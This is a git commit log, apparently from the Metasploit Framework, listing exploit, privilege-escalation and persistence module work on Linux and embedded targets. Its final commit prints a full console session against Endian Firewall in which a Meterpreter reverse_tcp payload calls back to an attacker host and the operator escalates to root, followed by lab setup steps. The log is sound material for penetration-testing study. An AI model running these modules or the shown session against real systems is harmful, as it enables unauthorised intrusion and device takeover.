c036c258a9
cve-2016-4557
2016-09-29 05:23:12 -04:00
2272e15ca2
Remove some anti-patterns, in the same spirit than #7372
2016-09-29 00:15:01 +02:00
988471b860
Land #7372 , useless use of cat fix
...
Obligatory: modules/exploits/linux/local/kloxo_lxsuexec.rb.
2016-09-28 16:37:11 -05:00
3033c16da6
Add missing rank
2016-09-28 16:37:04 -05:00
b46073b34a
Replace `cat` with Ruby's `read_file`
...
Thanks to wvu-r7 for the comment
2016-09-28 23:22:19 +02:00
45ee59581b
Fix inverted logic in Docker exploit
...
Positive condition should be tested first, imo. Confusing otherwise. My
bad, though.
Credit to @fslavin-r7.
2016-09-28 15:36:09 -05:00
dbb2abeda1
Remove the `cat $FILE | grep $PATTERN` anti-pattern
...
The `kloxo_lxsuexec.rb` and `netfilter_pvi_esc.rb` exploits
were using the infamous `cat+grep` anti-pattern, this commit
replaces it with `cat` and Ruby's `.include?` method.
2016-09-28 13:41:25 +02:00
6382fffc75
Land #7326 , Linux Kernel Netfilter Privesc
2016-09-26 12:38:50 -05:00
23e5556a4c
binary drops work!
2016-09-24 21:31:00 -04:00
7646771dec
refactored for live compile or drop binary
2016-09-22 20:07:07 -04:00
88cef32ea4
Land #7339 , SSH module fixes from net:ssh updates
2016-09-22 00:27:32 -05:00
04f8f7a0ea
Land #7266 , Add Kaltura Remote PHP Code Execution
2016-09-21 17:14:49 -05:00
2d3c167b78
Grammar changes again.
2016-09-20 23:51:12 +03:00
0f16393220
Yet another grammar changes
2016-09-20 19:48:40 +03:00
fb00d1c556
Another minor grammer changes
2016-09-20 19:23:28 +03:00
251421e4a7
Minor grammar changes
2016-09-20 10:37:39 -05:00
385428684f
Move module and docs under the exploit/linux/http folder
2016-09-20 12:45:23 +03:00
e315ec4e73
Merge branch 'master' into bug/7321/fix-ssh-modules
2016-09-19 15:27:37 -05:00
edd1704080
reexploit and other docs and edits added
2016-09-18 09:01:41 -04:00
4f85a1171f
reexploit and other docs and edits added
2016-09-18 08:51:27 -04:00
d2100bfc4e
Land #7301 , Support URIHOST for exim4_dovecot_exec for NAT
2016-09-16 12:49:57 -07:00
7c396dbf59
Use URIHOST
2016-09-16 12:48:54 -07:00
4d0643f4d1
Add missing DefaultTarget to Docker exploit
2016-09-16 13:09:00 -05:00
da516cb939
Land #7027 , Docker privesc exploit
2016-09-16 12:44:21 -05:00
e3060194c6
Fix formatting in ubiquiti_airos_file_upload
...
Also add :config and :use_agent options.
2016-09-16 12:27:09 -05:00
7393d91bfa
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into upstream-master
2016-09-16 10:46:44 +01:00
4be4bcf7eb
forgot updates
2016-09-16 02:08:09 -04:00
2e42e0f091
first commit
2016-09-16 01:54:49 -04:00
dfcd5742c1
some more minor fixes
...
some more minor fixes around broken
ssh modules
7321
2016-09-15 14:25:17 -05:00
e10c133eef
fix the exagrid exploit module
...
split the exagrid exploit module up and
refactor to be able to easily tell if the
key or the password was used
7321
2016-09-15 11:44:19 -05:00
c6214d9c5e
Fix and clean module
2016-09-14 14:36:29 -05:00
7352029497
first round of SSL damage fixes
2016-09-13 17:42:31 -05:00
11342356f8
Support LHOST for metasploit behind NAT
2016-09-13 11:23:49 +10:00
c06ee991ed
Adding WiFi pineapple command injection via authenticaiton bypass.
2016-09-06 17:22:25 -07:00
8d40dddc17
Adding WiFi pineapple preconfig command injection module.
2016-09-06 17:18:36 -07:00
e4d118108a
Trend Micro SafeSync exploit.
2016-09-06 19:33:23 +00:00
fed2ed444f
Remove deprecated modules
...
psexec_psh is undeprecated because users have been reporting
idiosyncrasies between it and psexec in the field.
2016-09-03 12:43:01 -05:00
411689aa44
Adding changes to Samba exploit to target MIPSBE (this is for OpenWRT on a router
2016-09-01 10:05:13 +01:00
226ded8d7e
Land #6921 , Support basic and form auth at the same time
2016-08-25 16:31:26 -05:00
2b6576b038
Land #7012 , Linux service persistence module
2016-08-17 22:45:35 -05:00
c64d91457f
Land #7003 , cron/crontab persistence module
2016-08-17 22:45:16 -05:00
c64e1b8fe6
Land #7181 , NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance
2016-08-08 16:04:33 -05:00
cb04ff48bc
Land #7180 , Add exploit for CVE 2016-5674 / Nuuo / Netgear unauth RCE
2016-08-08 15:55:39 -05:00
8654baf3dd
Land #6880 , add a module for netcore/netdis udp 53413 backdoor
2016-08-08 15:43:34 -05:00
f98efb1345
Fix typos
2016-08-08 15:41:03 -05:00
1320647f31
Exploit for Trend Micro Smart Protection Server (CVE-2016-6267).
2016-08-08 18:47:46 +00:00
3b64b891a6
Update nuuo_nvrmini_unauth_rce.rb
2016-08-05 21:53:25 +01:00
746ba4d76c
Add bugtraq reference
2016-08-05 21:53:08 +01:00
2aca610095
Add github link
2016-08-04 17:38:31 +01:00
7d8dc9bc82
Update nuuo_nvrmini_unauth_rce.rb
2016-08-04 17:38:14 +01:00
b48518099c
add exploit for CVE 2016-5674
2016-08-04 16:55:21 +01:00
0deac80d61
add exploit for CVE 2016-5675
2016-08-04 16:54:38 +01:00
1e1866f583
Fix #7158 , tiki_calendar_exec incorrectly reports successful login
...
Fix #7158
2016-07-28 17:03:31 -05:00
864989cf6c
For echo command
2016-07-26 20:27:23 -05:00
4720d77c3a
Land #6965 , centreon useralias exec
2016-07-26 15:02:36 -07:00
b057a9486c
Don't use ssh agent
2016-07-19 17:07:22 -05:00
ff63e6e05a
Land #7018 , unvendor net-ssh
2016-07-19 17:06:35 -05:00
6f35a04e21
Incorporate review fixes, ensure PrependFork is true, fix echo compat.
2016-07-19 01:45:56 -05:00
b08d1ad8d8
Revert "Land #6812 , remove broken OSVDB references"
...
This reverts commit 2b016e02167b1d9596c7
2016-07-15 12:00:31 -05:00
03dca5fee2
updates round 2
2016-07-15 09:02:23 -04:00
33ce3ec3ed
fixes round 2
2016-07-15 08:44:39 -04:00
b6b52952f4
set ssh to non-interactive
...
have to set the non-interactive flag so that it does not
prompt the user on an incorrect password
MS-1688
2016-07-14 11:12:03 -05:00
01d0d1702b
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup
2016-07-14 09:48:28 -05:00
2b016e0216
Land #6812 , remove broken OSVDB references
2016-07-11 22:59:11 -05:00
a530aa4cf1
restrict perms a bit more
2016-07-11 22:22:34 -05:00
a107a0f955
remove unneeded rport/rhost defines
2016-07-11 22:22:34 -05:00
6bf51fe064
streamline payload generation
2016-07-11 22:22:34 -05:00
7ef6c8bf9e
ruby style updates
2016-07-11 22:22:33 -05:00
c1f51e7ddf
Update and fixup module against OpenNMS-16
2016-07-11 22:22:33 -05:00
50746eec29
Fixes comments in regards to #{peer}
2016-07-11 22:22:33 -05:00
ce8317294f
New module to exploit the OpenNMS Java Object Unserialization RCE vulnerability. This now gets flagged inside Nessus and there was no Metasploit module to exploit this.
...
This module exploits the vulnerability to a full session.
2016-07-11 22:22:32 -05:00
52c6daa0f2
Land #7048 , Riverbed SteelCentral NetProfiler and NetExpress Remote
...
Command Injection
2016-07-10 18:54:12 -05:00
b75084249a
Removed duplicate 'Privileged' key
2016-07-10 01:37:03 -04:00
25f49c0091
Fixed Description
...
Just cleaned up Description.
2016-07-08 16:17:39 -07:00
5f9f3259f8
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup
2016-07-05 10:48:38 -05:00
4ed12d7077
Added: support for credentials saving using report_cred method as suggested
...
Added: support for detection of valid user credentials to skip login SQLi if not necessary.
2016-07-02 01:41:13 -04:00
9663f88fdc
Download profile.zip instead of including it
...
profile.zip is GPL-licensed...
2016-07-01 01:17:23 -05:00
068a4007de
Riverbed SteelCentral NetProfiler & NetExpress Exploit Module
...
Changes to be committed:
new file: modules/exploits/linux/http/riverbed_netprofiler_netexpress_exec.rb
2016-06-29 22:27:40 -04:00
68bd4e2375
Fire and forget the shell
...
Edge case where reverse_perl returns 302 when app is unconfigured.
2016-06-29 14:51:05 -05:00
d414ea59c3
Remove bash dependency. Oops.
2016-06-28 22:39:45 -05:00
3d93c55174
move sshfactory into a mixin method
...
use a convience method to DRY up creation
of the SSHFactory inside modules. This will make it easier
to apply changes as needed in future. Also changed msframework attr
to just framework as per our normal convention
MS-1688
2016-06-28 15:23:12 -05:00
ee2d1d4fdc
Merge branch 'master' into feature/MS-1688/net-ssh-cleanup
2016-06-28 15:00:35 -05:00
5f044ffda0
s/print_warning/print_error.
2016-06-28 10:26:23 -05:00
0635fee820
Move some log lines to vprint_status.
2016-06-28 03:28:41 -05:00
6c11692b04
Add privilege escalation for host users that can access the docker daemon.
2016-06-28 03:24:41 -05:00
5f08591fef
Add Nagios XI exploit
2016-06-27 15:17:18 -05:00
1c20122648
fedora compatibility, added naming options
2016-06-25 08:43:55 -04:00
6c3871bd0c
update ssh modules to use new SSHFactory
...
updated all of our SSh based module to use the
new SSHFactory class to plug Rex::Sockets into
Net::SSH
MS-1688
2016-06-24 13:55:28 -05:00
18a3bf5f62
service persistence
2016-06-22 19:22:18 -04:00
de5152401a
Land #6992 , Add tiki calendar exec exploit
2016-06-22 11:18:14 -05:00
8697d3d6fb
Update tiki_calendar_exec module and documentation
2016-06-22 11:17:45 -05:00
0f2c1d886c
append over read and write
2016-06-21 16:56:34 -04:00
9cb57d78d7
updated check and docs that 14.2 may not be vuln
2016-06-21 16:48:09 -04:00
c7bacebd5b
slight issues found by void-in
2016-06-21 05:12:10 -04:00
4b8f572976
cron persistence
2016-06-20 21:45:04 -04:00
15a3d739c0
fix per wchen
2016-06-20 17:57:10 -04:00
6fe7698b13
follow redirect automatically
2016-06-19 20:24:54 -04:00
3f25c27e34
2 void-in fixes of 3
2016-06-19 14:35:27 -04:00
ddfd015310
functionalized calendar call, updated docs
2016-06-19 08:53:22 -04:00
3feff7533b
tiki calendar
2016-06-18 13:11:11 -04:00
ebde552982
gem version
2016-06-16 21:09:56 -04:00
9ea0b8f944
Land #6934 , Adds exploit for op5 configuration command execution
2016-06-16 14:36:10 -05:00
ea988eaa72
Add setsid to persist the shell
...
Prevents the watchdog from killing our session.
2016-06-16 11:31:35 -05:00
cfb034fa95
fixes all previously identified issues
2016-06-15 20:58:04 -04:00
81fa068ef0
pulling out the get params
2016-06-15 12:27:31 -04:00
52db99bfae
vars_post for post request
2016-06-15 07:24:41 -04:00
625d60b52a
fix the other normalize_uri
2016-06-14 15:03:07 -04:00
afc942c680
fix travis
2016-06-13 19:07:14 -04:00
bd4dacdbc3
added Rank
2016-06-13 19:04:06 -04:00
72ed478b59
added exploit rank
2016-06-13 18:56:33 -04:00
40f7fd46f9
changes outlined by wvu-r7
2016-06-13 18:52:25 -04:00
f63273b172
email change
2016-06-11 21:05:34 -04:00
bd6eecf7b0
centreon useralias first add
2016-06-11 20:57:18 -04:00
ec1248d7af
Convert to CmdStager
2016-06-10 20:42:01 -05:00
46239d5b0d
Add Apache Continuum exploit
2016-06-09 22:35:38 -05:00
d63dc5845e
wvu-r7 comment fixes
2016-06-09 21:52:21 -04:00
6da8c22171
Rename hash method to crypt
...
To avoid a conflict with Object#hash in Pro.
MS-1636
2016-06-09 15:21:40 -05:00
6f5edb08fe
pull uri from datastore consistently
2016-06-08 20:28:36 -04:00
c4aa99fdac
Land #6925 , ipfire proxy exec
2016-06-07 10:24:59 -05:00
7e84c808b2
Merge remote-tracking branch 'upstream/pr/6924' into dev
2016-06-07 09:24:25 -05:00
c2699ef194
rubocop fixes
2016-06-03 17:43:11 -04:00
2f837d5d60
fixed EDB spelling
2016-06-03 17:17:36 -04:00
8d76bdb8af
fixed EDB reference
2016-06-03 17:13:36 -04:00
d7cd10f586
Suggested updates for style and clarity
2016-06-03 14:04:58 -05:00
91658d2a61
Changes per rubocop and sinn3r
2016-06-03 12:42:38 -05:00
68d647edf1
Merge branch 'master' of https://github.com/rapid7/metasploit-framework into op5
2016-06-01 18:05:18 -04:00
52d5028548
op5 config exec
2016-06-01 15:07:31 -04:00
8ce59ae330
travis fixes
2016-05-31 05:46:20 -04:00
057947d7e8
ipfire proxy exec
2016-05-30 10:24:17 -04:00
9b5e3010ef
doc/module cleanup
2016-05-30 06:33:48 -04:00
df55f9a57c
first add of ipfire shellshock
2016-05-29 20:40:12 -04:00
14adcce8bf
Missed the HTTPUSERNAME fix
2016-05-27 18:37:04 -05:00
61f9cc360b
Correct casing - should be HttpUsername and HttpPassword
2016-05-27 18:31:54 -05:00
4dcddb2399
Fix #4885 , Support basic and form auth at the same time
...
When a module uses the HttpClient mixin but registers the USERNAME
and PASSWORD datastore options in order to perform a form auth,
it ruins the ability to also perform a basic auth (sometimes it's
possible to see both). To avoid option naming conflicts, basic auth
options are now HTTPUSERNAME and HTTPPASSWORD.
Fix #4885
2016-05-27 16:25:42 -05:00
6581fbd294
Add note about "mf" malware
...
This is the malware I found upon shelling my friend's device.
2016-05-20 23:09:10 -05:00
a16f4b5167
Return nil properly in rescue
...
Missed this because I copypasta'd myself.
2016-05-19 15:35:38 -05:00
d018bba301
Store SSH key as a note
...
I know, I know, it should use the creds model. >:[
2016-05-19 15:12:58 -05:00
9f738c3e41
Add note about overwritten files
2016-05-19 15:07:27 -05:00
8fccb26446
Add Ubiquiti airOS exploit
...
Thanks to my friend wolf359 for providing a test device!
2016-05-19 14:50:20 -05:00
4a4904149b
ruby conditional operator -> expression
2016-05-16 10:45:04 -05:00
4a3ab9d464
add a module for netcore/netdis udp 53413 backdoor
2016-05-16 02:11:53 -05:00
4b23d2dc58
Adjusting exception handling
...
This commit adjusts the error handling to close the socket before
calling fail_with and adds specific exceptions to catch
2016-05-11 17:18:51 -05:00
32ae3e881e
Adding save_cred and exception handling to module
...
This commit adds a save_cred method for saving off the credentials
upon a successful login attempt. Also, exception handling surrounding
the opening of the telnet socket has been added to avoid any accidental
resource leaking.
2016-05-10 20:54:44 -05:00
8eb3193941
Adding TP-Link sc2020n Module
...
This module exploits a command injection vulnerability in
TP-Link sc2020n network video cameras in order to start the
telnet daemon on a random port. The module then connects to
the telnet daemon, which returns a root shell on the device.
2016-05-08 14:02:50 -05:00
df44dc9c1c
Deprecate exploits/linux/http/struts_dmi_exec
...
Please use exploits/multi/http/struts_dmi_exec, which supports
Windows and Java targets.
2016-05-02 15:03:25 -05:00
6a00f2fc5a
mv exploits/linux/http/struts_dmi_exec.rb to exploits/multi/http/struts_dmi_exec.rb
2016-05-01 00:00:29 +08:00
ec66410fab
add java_stager / windows_stager | exploit with only one http request
2016-04-30 23:56:56 +08:00
d6a6577c5c
Default payload to linux/x86/meterpreter/reverse_tcp_uuid
...
Default to linux/x86/meterpreter/reverse_tcp_uuid for now because
of issue #6833
2016-04-29 11:52:50 -05:00
97061c1b90
Update struts_dmi_exec.rb
2016-04-29 11:13:25 -05:00
e9535dbc5b
Address all @FireFart's feedback
2016-04-29 11:03:15 -05:00
6f6558923b
Rename module as struts_dmi_exec.rb
2016-04-29 10:34:48 -05:00
4a95e675ae
Rm empty references
2016-04-24 11:46:08 -05:00
816bc91e45
Resolve #6807 , remove all OSVDB references.
...
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.
Resolve #6807
2016-04-23 12:32:34 -05:00
92ef8f4ab3
Land #6751 , Correct proftp version check at module runtime
2016-04-14 15:34:53 -05:00
c4aac2a54a
Remove unwanted comments
2016-04-07 11:22:57 -05:00
7658014fb7
Add CVEs
2016-04-07 08:39:29 -05:00
87d59a9bfb
Add exploit for ExaGrid known credentials
2016-04-07 04:17:43 -05:00
08736c798d
Correct proftp version check at module runtime
2016-04-05 13:06:10 -05:00
102d28bda4
Update atutor_filemanager_traversal
2016-03-22 14:44:07 -05:00
9cb43f2153
Update atutor_filemanager_traversal
2016-03-22 14:42:36 -05:00
3842009ffe
Add ATutor 2.2.1 Directory Traversal Exploit Module
2016-03-22 12:17:32 -05:00
1375600780
Land #6644 , datastore validation on assignment
2016-03-17 11:16:12 -05:00
05f585157d
Land #6646 , add SSL SNI and unify SSLVersion opts
2016-03-15 16:35:22 -05:00
3123175ac7
use MetasploitModule as a class name
2016-03-08 14:02:44 +01:00
f703fa21d6
Revert "change Metasploit3 class names"
...
This reverts commit 666ae14259
2016-03-07 13:19:55 -06:00
44990e9721
Revert "change Metasploit4 class names"
...
This reverts commit 3da9535e22
2016-03-07 13:19:48 -06:00
3da9535e22
change Metasploit4 class names
2016-03-07 09:57:22 +01:00
666ae14259
change Metasploit3 class names
2016-03-07 09:56:58 +01:00
eea8fa86dc
unify the SSLVersion fields between modules and mixins
...
Also actually handle the 'Auto' option that we had in the crawler and remove
hardcoded defaults in modules that do not need them.
2016-03-06 22:06:27 -06:00
c7c0e12bb3
remove various module hacks for the datastore defaults not preserving types
2016-03-05 23:11:39 -06:00
bc7bf28872
Land #6591 , don't require username for wrt110 cmd exec module
2016-02-18 20:20:15 -06:00
3b9502cb1d
Don't require username in wrt110 module.
2016-02-18 18:45:04 -06:00
3d1861b3f4
Land #6526 , integrate {peer} string into logging by default
2016-02-15 15:19:26 -06:00
5b3fb99231
Land #6549 , module option for X-Jenkins-CLI-Port
2016-02-10 10:34:33 -06:00
c67360f436
Remove extraneous whitespace
2016-02-10 09:44:01 -06:00
1d6b782cc8
Change logic
...
I just can't deal with this "unless" syntax...
2016-02-08 18:40:48 -06:00
d60dcf72f9
Resolve #6546 , support manual config for X-Jenkins-CLI-Port
...
Resolve #6546
2016-02-08 18:16:48 -06:00
12256a6423
Remove now-redundant peer
...
These all include either Msf::Exploit::Remote:Tcp or Msf::Exploit::Remote:HttpClient
2016-02-01 15:12:03 -06:00
d51be6e3da
Fixing typo
...
This commit fixes a typo in the word "service"
2016-01-28 16:44:42 -06:00
1ef7aef996
Fixing User : Pass delimiter
...
As per the PR comments, this commit replaces the user and
pass delimiter from "/" to ":"
2016-01-27 17:20:58 -06:00
4560d553b5
Fixing more issues from comments
...
This commit includes more minor fixes from the github
comments for this PR.
2016-01-24 19:43:02 -06:00
d877522ea5
Fixing various issues from comments
...
This commit fixes issues with specifying "rhost:rport",
replacing them instead with "peer". Also, a couple of
"Unknown" errors were replaced with "UnexpectedReply".
2016-01-23 13:43:09 -06:00
a5a2e7c06b
Fixing Disclosure Date
...
Disclosure date was in incorrect format, this commit
fixes the issue
2016-01-23 11:41:05 -06:00
8c8cdd9912
Adding Dlink DCS Authenticated RCE Module
...
This module takes advantage of an authenticated HTTP RCE
vulnerability to start telnet on a random port. The module
then connects to that telnet session and returns a shell.
This vulnerability is present in version 2.01 of the firmware
and resolved by version 2.12.
2016-01-23 11:15:23 -06:00
7259d2a65c
Use unless instead of if !
2016-01-05 13:05:01 -06:00
7907c93047
Add D-Link DCS-931L File Upload module
2016-01-05 04:15:38 +00:00
27a6aa0be1
Fix current msftidy warnings about PACKETSTORM vs URL
2015-12-24 09:05:02 -08:00
efdb6a8885
Land #6392 , @wchen-r7's 'def peer' cleanup, fixing #6362
2015-12-24 08:53:32 -08:00
e4f9594646
Land #6331 , ensure generic payloads raise correct exceptions on failure
2015-12-23 15:43:12 -06:00
cea3bc27b9
Fix #6362 , avoid overriding def peer repeatedly
...
def peer is a method that gets repeated a lot in modules, so we
should have it in the tcp mixin. This commit also clears a few
modules that use the HttpClient mixin with def peer.
2015-12-23 11:44:55 -06:00
ab3fe64b6e
Add method peer for jenkins_java_deserialize.rb
2015-12-15 01:18:27 -06:00
bd8aea2618
Fix check for jenkins_java_deserialize.rb
...
This fixes the following:
* nil return value checks
* handle missing X-Jenkins-CLI-Port scenario more properly
* proper HTTP path normalization
2015-12-14 11:25:59 -06:00
eb4611642d
Add Jenkins CLI Java serialization exploit module
...
CVE-2015-8103
2015-12-11 14:57:10 -06:00
a5c6e260f2
Update hp_vsa_login_bof.rb
...
Updated reference URL to latest location
2015-12-10 10:56:39 -05:00
11c1eb6c78
Raise Msf::NoCompatiblePayloadError if generate_payload_exe fails
...
Most exploits don't check nil for generate_payload_exe, they just
assume they will always have a payload. If the method returns nil,
it ends up making debugging more difficult. Instead of checking nil
one by one, we just raise.
2015-12-08 21:13:23 -06:00
385378f338
Add reference to Rapid7 advisory
2015-12-01 11:37:27 -06:00
9dbf7cb86c
Remove the SSL option (not needed)
2015-12-01 11:34:03 -06:00
758e7c7b58
Rename
2015-12-01 11:33:45 -06:00
ea2174fc95
Typo and switch from raw -> encoded
2015-12-01 10:59:12 -06:00
16d0d53150
Update Shellshock modules, add Advantech coverage
2015-12-01 10:40:46 -06:00
8d1f5849e0
Land #6228 , @m0t's module for F5 CVE-2015-3628
2015-11-18 15:39:40 -08:00
ae3d65f649
Better handling of handler creation output
2015-11-18 15:31:32 -08:00
bcdf2ce1e3
Better handling of invulnerable case; fix 401 case
2015-11-18 15:24:41 -08:00
deec836828
scripts/handlers cannot start with numbers
2015-11-18 12:31:46 -08:00
7399b57e66
Elminate multiple sessions, better sleep handling for session waiting
2015-11-18 12:23:28 -08:00
e4bf5c66fc
Use slightly larger random script/handler names to avoid conflicts
2015-11-18 11:51:44 -08:00
e7307d1592
Make cleanup failure messages more clear
2015-11-18 11:44:34 -08:00
0e3508df30
Squash minor rubocop gripes
2015-11-18 11:05:10 -08:00
f8218f0536
Minor updates to print_ output; wire in handler_exists;
2015-11-18 11:05:10 -08:00
392803daed
Tighten up cleanup code
2015-11-18 11:05:10 -08:00
c0d9c65ce7
always overwrite the payload file
2015-11-18 18:48:34 +00:00
e21bf80ae4
Squash a rogue space
2015-11-17 14:17:59 -08:00
3396fb144f
A little more simplification/cleanup
2015-11-17 14:16:29 -08:00
dcfb3b5fbc
Let Filedropper handle removal
2015-11-17 13:01:06 -08:00
715f20c92c
Add missing super in setup
2015-11-16 14:45:13 -08:00
902951c0ca
Clean up description; Simplify SOAP code more
2015-11-16 11:06:45 -08:00
1aa1d7b5e4
Use random path for payload
2015-11-16 10:57:48 -08:00
ee5d91faab
Better logging when exploit gets 401
2015-11-16 10:41:48 -08:00
c4ffd7ae36
When sending SOAP requests, print out proto/status/message when fail
2015-11-16 10:38:40 -08:00
e58e17450a
Simplify XML building
2015-11-13 11:36:56 -08:00
ecbd453301
Second pass at style cleanup. Conforms now
2015-11-13 11:24:11 -08:00
85e5b0abe9
Initial style cleanup
2015-11-13 10:42:26 -08:00
eae2d6c89d
F5 module
2015-11-12 09:51:09 +00:00
f86f427d54
Move Compat into Payload so that is actually used
2015-11-09 16:06:05 -06:00
66ed66cc81
Merge pull request #1 from m0t/changes
...
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)
2015-11-09 16:11:29 +00:00
daa999fb1c
f5 module
2015-11-09 16:02:32 +00:00
d4d4e3ddb0
f5 module
2015-11-09 13:41:59 +00:00
893c4cd52d
f5 module
2015-11-09 13:10:54 +00:00
154fb585f4
Remove bad references (dead links)
...
These links are no longer available. They are dead links.
2015-10-27 12:41:32 -05:00
d67b55d195
Fix autofilter values for aggressive modules
2015-10-13 15:56:18 -07:00
185e947ce5
Spell 'D-Link' correctly
2015-10-12 17:12:01 -05:00
336c56bb8d
Note the CAPTCHA exploit is good on 1.12.
2015-10-12 17:09:45 -05:00
23ab702ec4
Land #5631 , @blincoln682F048A's module for Endian Firewall Proxy
...
* Exploit CVE-2015-5082
2015-09-04 16:28:32 -05:00
2abfcd00b1
Use snake_case
2015-09-04 16:27:09 -05:00
15aa5de991
Use Rex::MIME::Message
2015-09-04 16:26:53 -05:00
adcd3c1e29
Use static max length
2015-09-04 16:18:55 -05:00
1ebc25092f
Delete some comments
2015-09-04 16:18:15 -05:00
cd65478d29
Land #5826 , swap ExitFunction -> EXITFUNC
2015-09-01 13:58:12 -05:00
3e613dc333
change exitfunc to thread
2015-09-01 10:43:45 +02:00
648c034d17
change exitfunc to thread
2015-09-01 10:42:15 +02:00
80a22412d9
use EXITFUNC instead of ExitFunction
2015-08-13 21:22:32 +02:00
203c231b74
Fix #5659 : Update CMD exploits payload compatibility options
2015-08-10 17:12:59 -05:00
768de00214
Automatically pass arch & platform from cmdstager
...
This allows the cmdstager mixin to automatically pass the arch
and platform information without changing the modules. This should
address the following tickets:
Fix #5727
Fix #5718
Fix #5761
2015-07-27 14:17:21 -05:00
6720a57659
Fix #5761 , pass the correct arch and platform for exe generation
...
Fix #5761
2015-07-23 01:34:44 -05:00
b31c637c1b
Land #5533 , DSP-W110 cookie command injection
2015-07-15 11:22:33 +02:00
21375edcb2
final cleanup
2015-07-15 11:21:39 +02:00
d7beb1a685
feedback included
2015-07-09 08:31:11 +02:00
25e0f888dd
Initial commit of R7-2015-08 coverage
2015-07-08 13:42:11 -05:00
5b6ceff339
mime message
2015-07-06 15:00:12 +02:00
6e9a477367
Removed reference URL for the report to the vendor, as it is no
...
longer valid.
2015-07-03 13:48:24 -07:00
02ace9218b
Added handling for HTTP 401 (Authorization Required) response from target.
...
Added Exploit DB entries to references list.
Minor change to description text for clarity.
2015-07-03 13:36:44 -07:00
db721dff8e
Cleaned up double-negative logic.
...
Decreased default HTTPClientTimeout to 5 seconds.
2015-07-01 09:34:11 -07:00
6ceb734972
Replaced standard option TIMEOUT with advanced option
...
HTTPClientTimeout per void-in's request.
Added handling for HTTP 404 response condition from server.
2015-07-01 09:04:15 -07:00
3d32438b34
Added missing closing paren in description text.
2015-06-30 12:43:31 -07:00
e929dec829
Re-formatted and tweaked the module description.
2015-06-30 12:42:17 -07:00
ce61bcd3b4
Removed a trailing space from line 40.
2015-06-29 22:48:16 -07:00
13dc181f1c
Exploit Module: Endian Firewall Proxy Password Change Command Injection
...
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5082
(CVE is new as of today, so that page may not display correctly yet)
Targets an OS command injection vulnerability in most released versions
of Endian Firewall. Tested successfully against the following versions:
1.1 RC5
2.0
2.1
2.2
2.5.1
2.5.2
Known to not work against the following versions, due to bugs in the
vulnerable CGI script which also prevent normal use of it:
2.3
2.4.0
3.0.0
3.0.5 beta 1
Requires that at least one username and password be defined in the
local auth store for the Squid proxy component on the system, and that
the attacker know that username and password. Administrative or other
credentials are not required.
Provides OS command execution as the "nobody" account, which (on
all tested versions) has sudo permission to (among other things) run
a script which changes the Linux root account's password.
Example usage / output:
```
msf > use exploit/linux/http/efw_chpasswd_exec
msf exploit(efw_chpasswd_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(efw_chpasswd_exec) > set LHOST 172.16.47.13
LHOST => 172.16.47.13
msf exploit(efw_chpasswd_exec) > set LPORT 443
LPORT => 443
msf exploit(efw_chpasswd_exec) > set RHOST 172.16.47.1
RHOST => 172.16.47.1
msf exploit(efw_chpasswd_exec) > set EFW_USERNAME proxyuser
EFW_USERNAME => proxyuser
msf exploit(efw_chpasswd_exec) > set EFW_PASSWORD password123
EFW_PASSWORD => password123
msf exploit(efw_chpasswd_exec) > exploit
[*] Started reverse handler on 172.16.47.13:443
[*] Command Stager progress - 18.28% done (196/1072 bytes)
[*] Command Stager progress - 36.57% done (392/1072 bytes)
[*] Command Stager progress - 54.85% done (588/1072 bytes)
[*] Command Stager progress - 73.13% done (784/1072 bytes)
[*] Command Stager progress - 91.42% done (980/1072 bytes)
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1138688 bytes) to 172.16.47.1
[*] Meterpreter session 1 opened (172.16.47.13:443 -> 172.16.47.1:36481) at 2015-06-29 10:20:13 -0700
[*] Command Stager progress - 100.47% done (1077/1072 bytes)
meterpreter > getuid
Server username: uid=99, gid=99, euid=99, egid=99, suid=99, sgid=99
meterpreter > sysinfo
Computer : efw220.vuln.local
OS : Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter > shell
Process 5768 created.
Channel 1 created.
sh: no job control in this shell
sh-3.00$ whoami
nobody
sh-3.00$ uname -a
Linux efw220.vuln.local 2.6.22.19-72.endian15 #1 SMP Mon Sep 8 11:49:17 EDT 2008 i686 i686 i386 GNU/Linux
sh-3.00$ sudo /usr/local/bin/chrootpasswd
IlikerootaccessandIcannotlie
sh-3.00$ su
Password:IlikerootaccessandIcannotlie
bash: no job control in this shell
bash-3.00# whoami
root
```
Steps to verify module functionality:
Go to http://sourceforge.net/projects/efw/files/Development/
Select version 2, 2.1, 2.2, 2.5.1, or 2.5.2.
Download the ISO file for that version.
Create a VM using the ISO:
For purposes of VM configuration:
- Endian is based on the RHEL/CentOS/Fedora Core Linux
distribution.
- The ISOs will create a 32-bit x86 system.
- 512MB of RAM and 4GB of disk space should be more than enough.
- Be sure to configure the VM with at least two NICs, as the Endian
setup is difficult (impossible?) to complete with less than two
network interfaces on the host.
For the Endian OS-level (Linux) installation:
- Default options are fine where applicable.
- Be sure to pick a valid IP for the "Green" network interface, as
you will use it to access a web GUI to complete the configuration
- If prompted to create a root/SSH password and/or web admin
password, make a note of them. Well, make a note of the web admin
password - the exploit module will let you change the root
password later if you want to. This step is dependent on the
version selected - some will prompt, others default the values to
"endian".
- Once the OS-level configuration is complete, access the web
interface to complete the setup. If you used 172.16.47.1 for the
"Green" interface, then the URL will be
https://172.16.47.1:10443/
- If the web interface is not accessible, reboot the VM (in some
versions, the web interface does not come up until after the
first post-installation reboot).
For the web interface-based configuration:
- If you were prompted to select an admin password, use it. If not,
the username/password is admin/endian.
- Use the second NIC for the "Red" interface. It will not actually
be used during this walkthrough, so feel free to specify a bogus
address on a different/nonexistent subnet. Same for its default
gateway.
- Once the base configuration is complete, access the main web
interface URL again.
- Switch to the Proxy tab.
- Enable the HTTP proxy.
- Click Save (or Apply, depending on version).
- If prompted to apply the settings, do so.
- Click on the Authentication sub-tab.
- Make sure the Authentication Method is Local (this should be the
default).
- Click the _manage users_ (Or _User management_, etc., depending
on version) button.
- Click the _Add NCSA user_ (or _Add a user_, etc.) link.
